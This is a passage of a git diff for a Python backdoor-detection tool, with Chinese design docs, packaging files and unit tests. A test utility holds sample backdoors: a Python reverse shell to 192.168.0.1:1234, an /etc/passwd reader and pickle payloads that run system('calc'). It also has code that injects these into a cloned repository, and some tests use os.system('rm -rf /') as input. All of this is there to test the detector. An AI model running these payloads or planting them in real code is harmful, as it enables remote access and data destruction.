def save_as_markdown(output_path: str, data: str):
|
||||
with open(output_path, "w") as file:
|
||||
file.write("## Vulnerability Report: \n\n")
|
||||
file.write(data)
|
||||
|
||||
|
||||
def save_as_txt(output_path: str, data: str):
|
||||
with open(output_path, "w") as file:
|
||||
file.write("Vulnerability Report: \n\n")
|
||||
file.write(data)
|
||||
|
||||
|
||||
def print_separator(title, char="-", length=50, padding=2):
|
||||
print(f"{title:^{length + 4*padding}}") # 居中打印标题,两侧各有padding个空格
|
||||
print(char * (length + 2 * padding)) # 打印分割线,两侧各有padding个字符的空格
|
||||
|
||||
|
||||
def modify_file_name(file_path: str) -> str:
|
||||
"""
|
||||
Modify the file name by adding '-re' before the file extension.
|
||||
|
||||
Args:
|
||||
file_path (str): The original file path.
|
||||
|
||||
Returns:
|
||||
str: The modified file path.
|
||||
"""
|
||||
directory, file_name = os.path.split(file_path)
|
||||
name, ext = os.path.splitext(file_name)
|
||||
new_file_name = f"{name}-re{ext}"
|
||||
new_file_path = os.path.join(directory, new_file_name)
|
||||
return new_file_path
|
||||
|
||||
|
||||
def requirement_detection(requirement_path, output_path=None):
|
||||
base_url = "https://security.snyk.io/package/pip/"
|
||||
requirements = load_requirements(requirement_path)
|
||||
results = check_vulnerabilities(requirements, base_url)
|
||||
if output_path is not None:
|
||||
new_path = modify_file_name(output_path)
|
||||
save_to_file(new_path, results)
|
||||
print(f"Vulnerability scan complete. Results saved to {output_path}")
|
||||
print(f"Requirements scan complete. Results saved to {new_path}")
|
||||
else:
|
||||
print_separator("\nVulnerability Report", "=", 40, 5)
|
||||
print(results)
|
||||
24
detection/utils.py
Normal file
24
detection/utils.py
Normal file
@@ -0,0 +1,24 @@
|
||||
import re
|
||||
import sys
|
||||
|
||||
|
||||
def read_file_content(file_path: str) -> str:
|
||||
try:
|
||||
with open(file_path, "r", encoding="utf-8", errors="ignore") as file:
|
||||
return file.read()
|
||||
except FileNotFoundError:
|
||||
print("Error: File not found.")
|
||||
sys.exit(1)
|
||||
except IOError:
|
||||
print("Error: Could not read file.")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def remove_comments(code: str, extension: str) -> str:
|
||||
if extension == ".py":
|
||||
return code.split("#")[0].strip()
|
||||
elif extension in {".js", ".cpp"}:
|
||||
code = re.sub(r"//.*", "", code)
|
||||
code = re.sub(r"/\*.*?\*/", "", code, flags=re.DOTALL)
|
||||
return code.strip()
|
||||
return code.strip()
|
||||
21
docs/README.md
Normal file
21
docs/README.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# 项目文档
|
||||
|
||||
此目录用于记录本项目的各类文档,如用法文档、思路文档、技术文档等。
|
||||
|
||||
## 文件结构
|
||||
|
||||
- **usage.md**: 该文件包含了项目的使用文档,详细说明了如何安装、配置和使用本项目。
|
||||
- **design.md**: 该文件记录了项目的设计思路,包括架构设计、模块划分等内容。
|
||||
- **tech_notes.md**: 该文件包含了技术文档,记录了项目中涉及的技术细节、解决方案和实现方法等。
|
||||
|
||||
## 使用方法
|
||||
|
||||
请参阅 **[usage.md](./usage.md)** 获取关于如何使用本项目的详细信息。
|
||||
|
||||
## 设计思路
|
||||
|
||||
初步的实现方案记录在 **[idea.md](./idea.md)** 文件中,实际采用的详细设计思路记录在 **[design.md](./design.md)** 文件中。
|
||||
|
||||
## 技术文档
|
||||
|
||||
项目的技术文档可以在 **[tech_notes.md](./tech_notes.md)** 中找到,其中包含了项目中所用技术的详细说明和相关资料。
|
||||
136
docs/design.md
Normal file
136
docs/design.md
Normal file
@@ -0,0 +1,136 @@
|
||||
# 项目设计文档 - 后门检测系统
|
||||
|
||||
## 打包
|
||||
|
||||
### 简介
|
||||
|
||||
本项目需要将 Python 代码打包成`pip`包和`deb`包,以便于分发和安装。以下是如何实现和使用该打包功能的详细步骤。
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 静态代码后门检测
|
||||
|
||||
**功能描述**:
|
||||
这个脚本用于扫描指定路径下的代码文件,检测潜在的危险函数调用,支持 `.py`, `.js`, `.cpp`, `.pyc` 文件。
|
||||
|
||||
**主要组件**:
|
||||
|
||||
- `read_file_content(file_path)`: 读取文件内容。
|
||||
- `remove_comments(code, extension)`: 移除代码中的注释。
|
||||
- `find_dangerous_functions(file_content, file_extension)`: 检测并标记危险函数的使用与威胁等级。
|
||||
- `output_results(results, output_format, output_file)`: 输出检测结果到指定格式和路径。
|
||||
|
||||
**输入**:
|
||||
|
||||
- 代码路径(文件或目录)。
|
||||
- 输出文件路径和格式(通过命令行参数指定)。
|
||||
|
||||
**输出**:
|
||||
|
||||
- 安全分析报告,可选格式为 HTML、Markdown、TXT 或 PDF。
|
||||
|
||||
**设计考虑**:
|
||||
|
||||
- 动态识别文件类型并适应不同的注释规则。
|
||||
- 使用正则表达式检测潜在的危险函数调用。
|
||||
- 使用 ReportLab 库生成 PDF,提供丰富的文档布局。
|
||||
|
||||
**使用示例**:
|
||||
|
||||
```bash
|
||||
python backdoor_detection.py ./src -o ./output/report.pdf
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 依赖版本漏洞检测
|
||||
|
||||
**功能描述**:
|
||||
这个脚本用于检测项目依赖中是否存在已知的安全漏洞。它通过读取一个包含漏洞信息的文件和项目的 `requirements.txt`,对比确定哪些依赖项是不安全的。
|
||||
|
||||
**主要组件**:
|
||||
|
||||
- `parse_html`: 爬取网站收集的漏洞依赖信息。
|
||||
- `trans_vulnerable_packages(content)`: 将漏洞版本中的集合形式转换为大于小于的格式。
|
||||
- `load_requirements(filename)`: 从项目的 `requirements.txt` 文件中加载依赖信息。
|
||||
- `output_results(filename, results, format_type)`: 根据指定格式输出检测结果。
|
||||
- `check_vulnerabilities(requirements, vulnerabilities, output_file)`: 核心功能,对比依赖与漏洞信息并生成报告。
|
||||
- `output_results(filename, results, format_type)`: 根据用户需求设置扫描结果输出格式。
|
||||
|
||||
**输入**:
|
||||
|
||||
- 项目 `requirements.txt` 文件路径。
|
||||
- 输出文件路径和格式(通过命令行参数指定)。
|
||||
|
||||
**输出**:
|
||||
|
||||
- 报告文件,格式可以是 HTML、Markdown、TXT 或 PDF。
|
||||
|
||||
**设计考虑**:
|
||||
|
||||
- 使用 `argparse` 处理命令行输入。
|
||||
- 使用 `packaging` 库来处理和比较版本号。
|
||||
- 使用异常处理来确保文件读写操作的安全性。
|
||||
|
||||
**使用示例**:
|
||||
|
||||
```bash
|
||||
python -m detection.requirements_detection ./requirements.txt -o ./output/report.md
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### 结论
|
||||
|
||||
这两个脚本为后门检测项目提供了两个不同的安全检查角度:一个是外部依赖的安全性,另一个是内部代码潜在的安全漏洞。通过将这两种功能结合,可以提供一个全面的安全审计工具,以保障项目的安全性。
|
||||
|
||||
---
|
||||
|
||||
以上就是针对后门检测系统的项目设计文档。通过这样的设计,项目团队可以更好地了解系统的运作方式和如何使用系统进行安全检测。
|
||||
46
docs/idea.md
Normal file
46
docs/idea.md
Normal file
@@ -0,0 +1,46 @@
|
||||
# 设计方案
|
||||
|
||||
## 静态代码分析
|
||||
|
||||
检查源代码的结构、语法和意图而不执行代码。通过这种方式,可以发现安全漏洞和后门的迹象,比如隐藏的函数、异常的API调用、敏感信息的硬编码等。
|
||||
|
||||
工具开发:使用正则表达式和模式匹配来搜索代码中的可疑结构或者片段。
|
||||
|
||||
参考项目: [https://github.com/SonarSource/sonarqube]
|
||||
|
||||
检查源代码的语法和关键词。通过这种方式,可以发现是否存在与其他语言的交互,比如调用外部命令、使用其他语言的扩展模块、与其他语言的接口交互等。
|
||||
|
||||
实现方法:可以使用Python代码解析库(如ast模块)来分析语法树,并检查特定的代码模式或结构;开发脚本来搜索Python代码中常用于与其他语言交互的关键词和函数,例如ctypes、subprocess、os.system等
|
||||
|
||||
## 控制流分析
|
||||
|
||||
通过分析程序的控制流(即程序中各个操作的执行顺序),可以检测到异常的控制流路径,这些路径可能是后门的迹象。
|
||||
|
||||
实现方法:检测代码中是否含有不可达的分支,如果有,则检测是否包含恶意代码,并根据威胁程度划分危险等级。
|
||||
|
||||
## 依赖分析
|
||||
|
||||
分析代码库中的依赖关系,确保所有外部库和包都是可信的,并且没有引入可能含有后门的恶意代码。
|
||||
|
||||
实施策略:开发脚本或工具来自动化检查外部库的可信度和更新记录。
|
||||
|
||||
这个网站可以搜索依赖中是否存在漏洞: [https://security.snyk.io/package/pip/]
|
||||
|
||||
分析代码库中的依赖关系,查找是否导入了与其他语言交互相关的模块或库
|
||||
|
||||
实施策略:开发脚本进行依赖库对比匹配
|
||||
|
||||
## 异常行为检测
|
||||
|
||||
通过定义“正常”代码行为的基线,可以标识出异常行为,这些异常行为可能指示着后门的存在。
|
||||
|
||||
行为模型:创建机器学习模型来学习代码的正常模式和行为,然后识别偏离这些模式的行为。
|
||||
|
||||
## 基于NLP的后门检测
|
||||
|
||||
使用NLP技术来训练机器学习模型,以自动从大量代码中学习和识别异常或潜在的后门模式。
|
||||
|
||||
开发方法:采用深度学习框架如TensorFlow或PyTorch,结合NLP处理工具,训练模型识别代码中的异常行为。
|
||||
|
||||
|
||||
|
||||
68
docs/tech_notes.md
Normal file
68
docs/tech_notes.md
Normal file
@@ -0,0 +1,68 @@
|
||||
# 技术说明文档 - 后门检测系统
|
||||
|
||||
本文档详细说明了后门检测系统中使用的技术和库,以及这些技术的应用方式和原理。
|
||||
|
||||
## 1. Python 编程语言
|
||||
|
||||
本项目主要使用 Python 编程语言编写。Python 是一种解释型、高级和通用的编程语言。Python 的设计哲学强调代码的可读性和简洁的语法(尤其是使用空格缩进划分代码块,而非使用大括号或关键字)。详细信息可参考:[Python 官网](https://www.python.org/)
|
||||
|
||||
## 2. `packaging` 库
|
||||
|
||||
`packaging` 库提供了版本号解析和比较的功能,非常适合用于处理和比较软件包的版本号。在本项目中,它被用来解析 `requirements.txt` 文件中的依赖版本,并与已知的漏洞版本进行比较,以判断是否存在安全风险。
|
||||
|
||||
- **主要应用**:比较依赖包版本是否在漏洞版本范围内。
|
||||
- **官方文档**:[packaging on PyPI](https://pypi.org/project/packaging/)
|
||||
|
||||
## 3. `reportlab` 库
|
||||
|
||||
`reportlab` 是 Python 中强大的 PDF 生成库,允许快速创建复杂的 PDF 文档。在此项目中,`reportlab` 用于生成具有格式化文本和布局的 PDF 报告。
|
||||
|
||||
- **主要应用**:生成 PDF 格式的报告,包括带有标题、段落和间距的文档结构。
|
||||
- **官方文档**:[ReportLab User Guide](https://www.reportlab.com/docs/reportlab-user-guide.pdf)
|
||||
|
||||
## 4. `argparse` 库
|
||||
|
||||
`argparse` 库是用于解析命令行参数和选项的标准库。它让开发者能够轻松地编写用户友好的命令行接口,程序可以从 `sys.argv` 中提取出所需的命令行参数。本项目中使用 `argparse` 来接收用户指定的文件路径和输出格式。
|
||||
|
||||
- **主要应用**:解析命令行输入,获取用户指定的文件路径和输出选项。
|
||||
- **官方文档**:[argparse — Command-line option and argument parsing](https://docs.python.org/3/library/argparse.html)
|
||||
|
||||
## 5. 正则表达式 (`re` 模块)
|
||||
|
||||
正则表达式在本项目中用于从配置文件中提取出软件包名称和版本范围。`re` 模块提供了对正则表达式的全面支持,允许进行复杂的字符串搜索、匹配及替换。
|
||||
|
||||
- **主要应用**:解析和处理文本数据,特别是在加载漏洞信息和分析代码文件时用于提取特定模式的字符串。
|
||||
- **官方文档**:[re — Regular expression operations](https://docs.python.org/3/library/re.html)
|
||||
|
||||
## 6. 文件处理
|
||||
|
||||
文件的读取和写入是通过 Python 的内置功能进行的,确保了项目能够处理外部数据文件和输出结果到指定的文件中。
|
||||
|
||||
- **主要应用**:读取漏洞数据文件和依赖文件,输出结果报告到文本、Markdown、HTML 或 PDF 文件。
|
||||
|
||||
## 7. 爬虫
|
||||
|
||||
利用`python`的`BeautifulSoup`制作爬虫快速收集整理信息
|
||||
|
||||
- **主要应用**:通过爬虫收集漏洞依赖信息并进行汇总,用于判断依赖是否存在漏洞版本。
|
||||
|
||||
## 8. 打包
|
||||
|
||||
本项目支持打包作为`pip`包进行发布
|
||||
|
||||
- **主要应用**:
|
||||
- `pip`通过`wheel`并自行撰写`setup.py`以及`MANIFEST.in`,将项目打包发布
|
||||
|
||||
## 9. 反汇编
|
||||
|
||||
项目通过`uncompyle6`库提供的反汇编模块可以实现对python字节码进行反汇编之后扫描危险代码
|
||||
|
||||
## 10. 代码和风险分析
|
||||
|
||||
项目中实现了基本的静态代码分析功能,用于识别和报告潜在的安全风险函数调用,如 `system`、`exec` 等。
|
||||
|
||||
- **技术说明**:通过正则表达式匹配高风险函数的调用,评估代码文件的安全性。
|
||||
|
||||
通过这些技术的综合应用,后门检测系统能够为用户提供全面的安全检测功能,
|
||||
|
||||
帮助识别和预防安全风险。这些技术的深入了解和正确应用是确保系统有效运行的关键。
|
||||
118
docs/usage.md
Normal file
118
docs/usage.md
Normal file
@@ -0,0 +1,118 @@
|
||||
# 使用说明文档 - 后门检测系统
|
||||
|
||||
本文档提供了后门检测系统的使用方法,包括依赖版本漏洞检测和静态代码后门检测两部分。这将帮助用户正确执行安全检测,并理解输出结果。
|
||||
|
||||
## 下载和配置
|
||||
|
||||
- 克隆或下载后门检测系统到您的本地环境。
|
||||
- 确保脚本文件 (`requirements_detection.py` 和 `backdoor_detection.py`) 在您的工作目录中。
|
||||
|
||||
## 打包
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 运行依赖版本漏洞检测脚本
|
||||
|
||||
**命令格式**:
|
||||
|
||||
```bash
|
||||
python -m detection.requirements_detection <requirements_file> -o <output_file>
|
||||
```
|
||||
|
||||
**参数说明**:
|
||||
|
||||
- `<requirements_file>`: 项目的 `requirements.txt` 文件路径。
|
||||
- `<output_file>`: 指定输出结果的文件路径和格式,支持的格式有 `.txt`, `.md`, `.html`, `.pdf`。
|
||||
|
||||
**示例**:
|
||||
|
||||
```bash
|
||||
python -m detection.requirements_detection requirements.txt -o output/report.md
|
||||
```
|
||||
|
||||
## 运行静态代码后门检测脚本
|
||||
|
||||
**命令格式**:
|
||||
|
||||
```bash
|
||||
python -m detection <code_path> -o <output_file> -m <mode>
|
||||
```
|
||||
|
||||
**参数说明**:
|
||||
|
||||
- `<code_path>`: 代码文件或目录的路径。
|
||||
- `<output_file>`: 指定输出结果的文件路径和格式,支持的格式有 `.txt`, `.md`, `.html`, `.pdf`。
|
||||
- `<mode>`: 指定检测模式,目前支持的模式有 `regex` 和 `llm`。
|
||||
|
||||
**示例**:
|
||||
|
||||
```bash
|
||||
python -m detection ./src -o output/report.pdf -m regex
|
||||
```
|
||||
|
||||
## 结果解读
|
||||
|
||||
- 输出结果将根据指定的格式保存在您指定的文件中。
|
||||
- 结果中会标注出每个文件中发现的高风险和中风险函数调用位置。
|
||||
- 对于依赖检测,结果将标明每个依赖包的安全状态,包括存在安全风险的依赖及其版本。
|
||||
|
||||
## 常见问题处理
|
||||
|
||||
- 确保所有路径都正确无误,避免因路径错误导致文件读取失败。
|
||||
- 如果输出格式指定错误,系统将默认输出为 `.txt` 格式。
|
||||
- 确保安装了所有必要的依赖库,以避免运行时错误。
|
||||
|
||||
## 支持
|
||||
|
||||
如果您在使用过程中遇到任何问题,或需要进一步的技术支持,请联系开发团队或访问我们的Git仓库以获取帮助和最新信息。
|
||||
|
||||
---
|
||||
|
||||
以上是后门检测系统的使用说明文档。请按照这些步骤进行操作,以确保您能有效地使用本系统进行安全检测。
|
||||
7
requirements.txt
Normal file
7
requirements.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
reportlab
|
||||
requests
|
||||
packaging
|
||||
openai
|
||||
bs4
|
||||
colorama
|
||||
tqdm
|
||||
44
setup.py
Normal file
44
setup.py
Normal file
@@ -0,0 +1,44 @@
|
||||
# pip install wheel
|
||||
# python setup.py sdist bdist_wheel
|
||||
|
||||
from setuptools import setup, find_packages
|
||||
|
||||
|
||||
def read_file(filename: str) -> str:
|
||||
"""Read a file and return its content as a string.
|
||||
|
||||
Args:
|
||||
filename (str): The name of the file to read.
|
||||
|
||||
Returns:
|
||||
str: The content of the file.
|
||||
"""
|
||||
with open(filename, encoding="utf-8") as f:
|
||||
return f.read()
|
||||
|
||||
|
||||
setup(
|
||||
name="backdoor_buster",
|
||||
version="0.1.0",
|
||||
author="ciscn",
|
||||
description="A tool for integrated backdoor detection",
|
||||
long_description=read_file("README.md"),
|
||||
long_description_content_type="text/markdown",
|
||||
url="https://git.mamahaha.work/sangge/BackDoorBuster",
|
||||
packages=find_packages(),
|
||||
classifiers=[
|
||||
"Programming Language :: Python :: 3",
|
||||
"License :: OSI Approved :: MIT License",
|
||||
"Operating System :: OS Independent",
|
||||
],
|
||||
python_requires=">=3.6",
|
||||
install_requires=[
|
||||
"reportlab",
|
||||
"requests",
|
||||
"packaging",
|
||||
"openai",
|
||||
"bs4",
|
||||
"tqdm",
|
||||
"colorama",
|
||||
],
|
||||
)
|
||||
0
tests/__init__.py
Normal file
0
tests/__init__.py
Normal file
159
tests/final_tests_util.py
Normal file
159
tests/final_tests_util.py
Normal file
@@ -0,0 +1,159 @@
|
||||
from typing import Tuple, List
|
||||
from git import Repo # type: ignore
|
||||
import random
|
||||
from pathlib import Path
|
||||
import pickle
|
||||
import os
|
||||
import py_compile
|
||||
|
||||
|
||||
def clone_repo(repo_url: str, clone_dir: str) -> None:
|
||||
"""
|
||||
Clone a Git repository to the specified directory.
|
||||
|
||||
Args:
|
||||
repo_url (str): The URL of the Git repository to clone.
|
||||
clone_dir (str): The directory where the repository should be cloned.
|
||||
"""
|
||||
try:
|
||||
Repo.clone_from(repo_url, clone_dir, depth=1)
|
||||
except Exception as e:
|
||||
print(f"Error cloning repository: {e}")
|
||||
|
||||
|
||||
# a return type of backdoor. Include injected file name and number.
|
||||
|
||||
|
||||
def inject_random_backdoor(
|
||||
path: str, sample_rate: float = 0.1
|
||||
) -> Tuple[Tuple[str, int], ...]:
|
||||
"""
|
||||
Insert random backdoor into the path.
|
||||
|
||||
Args:
|
||||
path (str): The path to the repository to insert the backdoor into.
|
||||
pickle (bool): Whether to insert a backdoor into a pickle file.
|
||||
pyc (bool): Whether to insert a backdoor into a compiled Python file.
|
||||
"""
|
||||
project_path = Path(path)
|
||||
all_python_files = list(project_path.rglob("*.py"))
|
||||
injected_python_files = []
|
||||
|
||||
for python_file in all_python_files:
|
||||
# sample files to inject backdoor
|
||||
if random.random() < sample_rate:
|
||||
injected_python_files.append(python_file)
|
||||
injectedNum = len(injected_python_files)
|
||||
|
||||
results: List[Tuple[str, int]] = []
|
||||
# inject backdoor
|
||||
for python_file in injected_python_files:
|
||||
with open(python_file, "r+", errors="ignore") as f:
|
||||
lines = f.readlines()
|
||||
total_lines = len(lines)
|
||||
inject_line_number = random.randint(0, total_lines)
|
||||
# choose random backdoor
|
||||
inject_code = random.choice(backdoors)
|
||||
lines.insert(inject_line_number, inject_code + "\n")
|
||||
f.seek(0)
|
||||
f.writelines(lines)
|
||||
results.append((str(python_file), inject_line_number))
|
||||
|
||||
return tuple(results)
|
||||
|
||||
|
||||
# 示例1: 通过 os.system 执行命令
|
||||
backdoor1 = """import os
|
||||
os.system('ls')"""
|
||||
|
||||
# 示例2: 通过 subprocess 模块执行命令
|
||||
backdoor2 = """import subprocess
|
||||
subprocess.call(['ls', '-l'])"""
|
||||
|
||||
# 示例3: 打开一个反向 shell
|
||||
backdoor3 = """import socket,subprocess,os
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.connect(("192.168.0.1",1234))
|
||||
os.dup2(s.fileno(),0)
|
||||
os.dup2(s.fileno(),1)
|
||||
os.dup2(s.fileno(),2)
|
||||
subprocess.call(["/bin/sh","-i"])"""
|
||||
|
||||
# 示例4: 通过 eval 执行任意代码
|
||||
backdoor4 = """code = "print('Hello, World!')"
|
||||
eval(code)"""
|
||||
|
||||
# 示例5: 通过 exec 执行任意代码
|
||||
backdoor5 = """code = '''
|
||||
import os
|
||||
os.system('ls')
|
||||
'''
|
||||
exec(code)"""
|
||||
|
||||
|
||||
# 示例7: 读取并显示文件内容
|
||||
backdoor7 = """with open('/etc/passwd', 'r') as file:
|
||||
data = file.read()
|
||||
print(data)"""
|
||||
|
||||
|
||||
backdoors = [
|
||||
backdoor1,
|
||||
backdoor2,
|
||||
backdoor3,
|
||||
backdoor4,
|
||||
backdoor5,
|
||||
backdoor7,
|
||||
]
|
||||
|
||||
backdoors_pickle = [
|
||||
b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.',
|
||||
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.',
|
||||
b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.',
|
||||
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.'
|
||||
]
|
||||
def inject_pickle_backdoor(root_path: str) -> None:
|
||||
"""
|
||||
Generate a pickle backdoor and insert it into the specified path.
|
||||
|
||||
Args:
|
||||
path (str): The path to the repository to insert the backdoor into.
|
||||
"""
|
||||
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
|
||||
paths = random.sample(all_path, random.randrange(1, len(all_path)))
|
||||
for path in paths:
|
||||
backdoor_id = random.randrange(0, len(backdoors_pickle))
|
||||
backdoor = backdoors_pickle[backdoor_id]
|
||||
filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
|
||||
with open(filename, "wb") as f:
|
||||
pickle.dump(backdoor, f)
|
||||
|
||||
|
||||
def inject_pyc_backdoor(root_path: str) -> None:
|
||||
"""
|
||||
Generate a pyc backdoor and insert it into the specified path.
|
||||
|
||||
Args:
|
||||
path (str): The path to the repository to insert the backdoor into.
|
||||
"""
|
||||
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
|
||||
paths = random.sample(all_path, random.randrange(1, len(all_path)))
|
||||
|
||||
for path in paths:
|
||||
backdoor_id = random.randrange(0, len(backdoors))
|
||||
backdoor = backdoors[backdoor_id]
|
||||
py_filename = os.path.join(path, f"backdoor{backdoor_id}.py")
|
||||
pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc")
|
||||
with open(py_filename, "w") as f:
|
||||
f.write(backdoor)
|
||||
|
||||
py_compile.compile(py_filename, cfile=pyc_filename)
|
||||
os.remove(py_filename)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
repo_url = "https://github.com/TheAlgorithms/Python.git"
|
||||
clone_dir = "/tmp/repo"
|
||||
clone_repo(repo_url, clone_dir)
|
||||
inject_random_backdoor(clone_dir)
|
||||
inject_pickle_backdoor(clone_dir)
|
||||
40
tests/test_CN_GPT_detection.py
Normal file
40
tests/test_CN_GPT_detection.py
Normal file
@@ -0,0 +1,40 @@
|
||||
import unittest
|
||||
import warnings
|
||||
import os
|
||||
import json
|
||||
|
||||
from detection.cngptdetection import detectGPT
|
||||
|
||||
class TestBackdoorDetection(unittest.TestCase):
|
||||
def test_gpt_risk_detection(self):
|
||||
if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
|
||||
warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
|
||||
self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
|
||||
|
||||
content = """import os
|
||||
os.system('rm -rf /') # high risk
|
||||
exec('print("Hello")') # high risk
|
||||
eval('2 + 2') # high risk
|
||||
"""
|
||||
results1 = detectGPT(content)
|
||||
classified_results = json.loads(results1)
|
||||
self.assertEqual(len(classified_results["high"]), 3)
|
||||
|
||||
def test_gpt_no_risk_detection(self):
|
||||
if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
|
||||
warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
|
||||
self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
|
||||
|
||||
content = """a = 10
|
||||
b = a + 5
|
||||
print('This should not be detected as risky.')
|
||||
"""
|
||||
results2 = detectGPT(content)
|
||||
classified_results = json.loads(results2)
|
||||
self.assertEqual(len(classified_results["high"]), 0)
|
||||
self.assertEqual(len(classified_results["medium"]), 0)
|
||||
self.assertEqual(len(classified_results["low"]), 0)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
112
tests/test_backdoor_detection.py
Normal file
112
tests/test_backdoor_detection.py
Normal file
@@ -0,0 +1,112 @@
|
||||
import unittest
|
||||
import warnings
|
||||
|
||||
from detection.__main__ import find_dangerous_functions
|
||||
from detection.GPTdetection import detectGPT
|
||||
import os
|
||||
|
||||
|
||||
class TestBackdoorDetection(unittest.TestCase):
|
||||
def test_high_risk_detection(self):
|
||||
content = """import os
|
||||
os.system('rm -rf /') # high risk
|
||||
exec('print("Hello")') # high risk
|
||||
eval('2 + 2') # high risk
|
||||
"""
|
||||
file_extension = ".py"
|
||||
results = find_dangerous_functions(content, file_extension)
|
||||
self.assertIn((2, "os.system('rm -rf /')"), results["high"])
|
||||
self.assertIn((3, "exec('print(\"Hello\")')"), results["high"])
|
||||
self.assertIn((4, "eval('2 + 2')"), results["high"])
|
||||
|
||||
def test_medium_risk_detection(self):
|
||||
content = """import subprocess
|
||||
subprocess.run(['ls', '-l']) # medium risk
|
||||
import os
|
||||
os.popen('ls') # medium risk
|
||||
"""
|
||||
file_extension = ".py"
|
||||
results = find_dangerous_functions(content, file_extension)
|
||||
self.assertIn((2, "subprocess.run(['ls', '-l'])"), results["medium"])
|
||||
self.assertIn((4, "os.popen('ls')"), results["medium"])
|
||||
|
||||
def test_no_risk_detection(self):
|
||||
content = """a = 10
|
||||
b = a + 5
|
||||
print('This should not be detected as risky.')
|
||||
"""
|
||||
file_extension = ".py"
|
||||
results = find_dangerous_functions(content, file_extension)
|
||||
self.assertEqual(len(results["high"]), 0)
|
||||
self.assertEqual(len(results["medium"]), 0)
|
||||
self.assertEqual(len(results["low"]), 0)
|
||||
|
||||
def test_inclusion_of_comments(self):
|
||||
content = """# Just a comment line
|
||||
print('This is a safe line')
|
||||
eval('2 + 2') # This should be high risk
|
||||
subprocess.run(['echo', 'hello']) # This should be medium risk
|
||||
"""
|
||||
file_extension = ".py"
|
||||
results = find_dangerous_functions(content, file_extension)
|
||||
self.assertIn(
|
||||
(3, "eval('2 + 2')"),
|
||||
results["high"],
|
||||
)
|
||||
self.assertIn(
|
||||
(4, "subprocess.run(['echo', 'hello'])"),
|
||||
results["medium"],
|
||||
)
|
||||
|
||||
def test_gpt_risk_detection(self):
|
||||
if os.getenv("OPENAI_API_KEY") is None:
|
||||
warnings.warn("OPENAI_API_KEY is not set, test skipped.", UserWarning)
|
||||
self.skipTest("OPENAI_API_KEY is not set")
|
||||
content = """import os
|
||||
os.system('rm -rf /') # high risk
|
||||
exec('print("Hello")') # high risk
|
||||
eval('2 + 2') # high risk
|
||||
"""
|
||||
results = detectGPT(content)
|
||||
self.assertEqual(len(results["high"]), 3)
|
||||
|
||||
def test_gpt_no_risk_detection(self):
|
||||
